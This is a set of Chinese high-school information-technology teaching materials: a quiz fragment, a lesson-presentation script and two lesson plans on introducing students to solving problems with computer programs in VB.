C.输入、输出设备和控制器D.输入、输出设备和CPU 6.计算机中存储容量的基本单位是___字节Byte__。
编制计算机程序解决问题(说课稿) 各位评委,各位老师,大家好! 我的说课题目是《编制计算机程序解决问题》,内容分为五个方面来说课,分别是说教材、说学情、说教法、说教学准备、说教学过程。 (一)说教材 1.本节的作用和地位 本节课说两个课时内容,是广东版《信息技术基础》第四章第一节的第一部分。前面第三章已 经学习了使用已有的软件对信息进行加工与表达,而本章学习的编写计算机程序解决问题也是信息 处理的基本方法,是使用计算机处理问题的延续,是学生初步掌握用计算机程序解决问题的基本方法,通过本节内容的学习,学生可了解到计算机的工作都是在执行程序,计算机是在人们的具体指令之下解决实际问题的,计算机执行的每一个动作都是程序员预先设计的。认识计算机程序的工作过程与基本特征,也是下学期选修模块《算法与程序设计》一书的衔接部分。 2.本节的主要内容介绍 本节课的内容结构是:执行一段计算机程序,对计算机程序解决问题的工作过程有初步认识;然后剖析程序实例;最后了解计算机程序设计的基本过程。 3.教学目标 (1)知识与技能 初步掌握编制计算机程序解决问题的过程 (2)过程与方法 通过大量的实际操作体验程序运行的过程并了解程序解决问题的过程。 (3)情感态度与价值观 ①培养学生进一步学习程序设计的兴趣。 ②培养他们用程序解决实际问题的思想,进一步提升他们的信息素养。 4.重难点分析 (1)教学重点: 帮助学生掌握用计算机程序解决问题的过程
(2)教学难点: 读懂计算机程序代码 (二)说学情 这节课之前学生已学完了广东版高中《信息技术基础》第一册前三章,从已有教学情况来看, 零起点问题虽然已不存在,但同学们的计算机基本操作水平参差不齐。而对于程序设计,因为初中没有学过,学生普遍知之甚少,有的甚至不知道程序为何物,知道的水平有限,更谈不上理论联系实际。因此,我认为,这节课既是本章重点又是难点。考虑到学生的实际情况,难点的难度应有所降低,能把握好“让学生体验”、“引发学习兴趣” 及“启发他们探究”这几个“度”就行了。 (三)说教法 在教学设计中安排大量的尝试性、探索性的活动,引导学生积极主动地完成学习任务。逐步建 立起自主性和研究性的学习模式,从而更加突出学生在教学过程中的主体地位。教学中还安排大量的实践性、操作性的内容,使学生在具体活动中理解信息技术的基本知识,掌握信息处理的基本技能,并能够灵活应用到学习和生活中。因此教学中采用了“启发式”、“探究式”等教学模式。 (四)说教学准备 1.教学课件、教学资源(加密解密、韩信点兵等小程序)等资源的准备; 2.VB环境调试、教室网络检查。 (五)说教学过程 (第一课时) ⑴导入 首先是通过一个小游戏,引入新课。 根据华氏温度计算出摄氏温度。采用以下公式: 式中的F表示华氏温度,C表示摄氏温度。 C=5/9*(F - 32)(其中F=92.89) 让两个学生在白板上写答案,教师用程序得出答案,看谁答得快。 【设计意图】以游戏引入新课,课堂气氛能够活跃一点,程序是和我们实际生活紧紧联系在一起的,使学生对“程序”产生兴趣,让学生在心里有听下去的欲望。 (2)体验程序的运行过程及作用 刘丽的妈妈是公司经理,她总是担心通过电子邮件与客户交流业务的信息万一被别人窃取了,将会 造成不可估量的损失。为此,刘丽上网查了资料,还请教了别人。同学们能帮刘丽想想办法吗?如:邮件打印出(比
课题:用计算机程序解决问题 课时:2课时 三维教学目标: 1.知识技能: 1、掌握VB语言与算法 2、能够根据生活中的问题。设计出程序去解决 2.过程方法: 理解程序的作用,学会编写程序,使待解决的问题得到解决 3.情感态度: 体会学习用计算机程序解决问题的意义,自觉养成多角度处理信息习惯,努力提高自己处理信息的能力。 设计思想: 用计算机程序解决问题是用计算机进行信息处理的几种基本方法之一。新课标中对这一部分“初步掌握用计算机进行信息处理的几种基本方法,认识其工作过程与基本特征”;的描述是: 对选修模块“算法与程序设计”的描述则为“……使学生进一步体验算法思想,了解算法和程序设计在解决问题过程中的地位和作用,能从简单问题出发,设计解决问题的算法,并能初步使用一种程序设计语言编制程序实现算法解决问题。” 高一级学生大部分对“程序”具有好奇心同时完全没接触过编程。急于看到自己的编程成果与严格规范的程序设计环境之间存在矛盾:一方面,程序设计不可能一蹴而就;一方面,学生的好奇心与求知欲应得到有效的引导与满足。协调好这两方面的矛盾需要有所取舍。 因此,在设计必修模块的这一单元时,我把目标定为“了解程序设计是什么,用程序解决问题的过程是什么”,绕开了设计程序时具体编程语言的语法规范、编程技巧等等环节。学生直接面向问题,分析问题,设计算法,运行程序,检测结果,从实践中体验程序设计的全过程。其中“编程调试”环节中程序由教师以学习资源的形式提供帮助,使学生摆脱语言的束缚,专心体会程序设计的内涵,构建起对程序的整体印象,初步对算法有所认识。总之,不要求学生能够编程序,只要求学生知道程序是什么,编程序是在干什么,并培养学生进一步学习程序设计的兴趣。 教学目标: 了解程序是什么,用程序解决问题的过程是什么,初步掌握程序设计的工作过程;培养学生进一步学习程序设计的兴趣。 教学重难点: 1、程序设计的整体流程 2、用程序设计的思想解决实际问题 3、培养学生学习程序设计的兴趣; 教学过程: 一、复习引入: 程序设计能够帮助解决我们学习中的问题。那么应用程序设计来解决问题的机制是什么样的?或者说,当面对一个具体问题,要编程序来解决时,作为程序员的我们要先做什么,再做什么?而计算机面对问题时,它又是怎样处理的? (有解的问题总是可以通过有限的步骤来完成的。面对问题时,首先是分析问题,接着把问题描述成有限的步骤序列,也即设计出算法。下面,我们通过实例的分析,来体验利用计算机程序解决决问题的过程:分析问题,设计解决问题的步骤序列,并通过运行程序来进一步了解计算机处理问题的方法)
探索计算机工作背后的秘密 (一)教学目标: 1. 知识与技能: ①认识计算机和程序,理解算法,了解流程图,知道程序的重要性。 ②通过体验几个简单的计算机程序实例,引发学生对计算机程序的强 烈兴趣。 ③编写简单程序,体验程序编写的乐趣。 2. 过程与方法目标 ①知道程序是解决现实世界某类相关问题的有效方法之一,逐步形成 程序设计的意识和能力。 ②培养学生用程序设计思想慎密思考问题的意识和能力 3. 情感态度与价值观目标 ①揭开程序设计的神秘感和畏难心理,培养学生进一步学习程序设计的 兴趣 ②感悟计算机程序设计的思想,增加学生的学习成就感和形成严谨客 观的解决问题作风。 (三)重点难点分析: (1)教学重点: (1)了解编制计算机程序解决实际问题的一般过程和方法。 (2)了解算法在整个过程中的地位和作用。 (2)教学难点: 解剖程序,了解其结构组成和具体作用,认识计算机程序设计的基本流程。 (二)教材分析: 用计算机程序解决问题,是信息加工和处理的一种重要手段,是人们把现实世界的任务转换成计算机可以直接识别并执行的指令代码。通过学习本节内容,让学生了解到计算机是在人们的具体指令之下解决实际问题的,计算机程序是一组操作指令或语句序列。以往使用过的工具软件事实上也是一种计算机程序,只不过那是别人已经编写好的,可以在计算机上直接使用的工具软件而已。通过操作和剖析已经编好的计算机程序,在解决实际问题中分析并了解其工作过程,这种通过问题分析并形成算法再利用计算机程序解决问题的思路和做法,对学生解决问题的时候有很大的帮助。 (四)学生分析 高一的学生已经具备了一定的计算机使用经验,但大多数是与常用的工具软件的使用和网络应用有关。对于计算机编程知识,他们以前可能很少或者根本没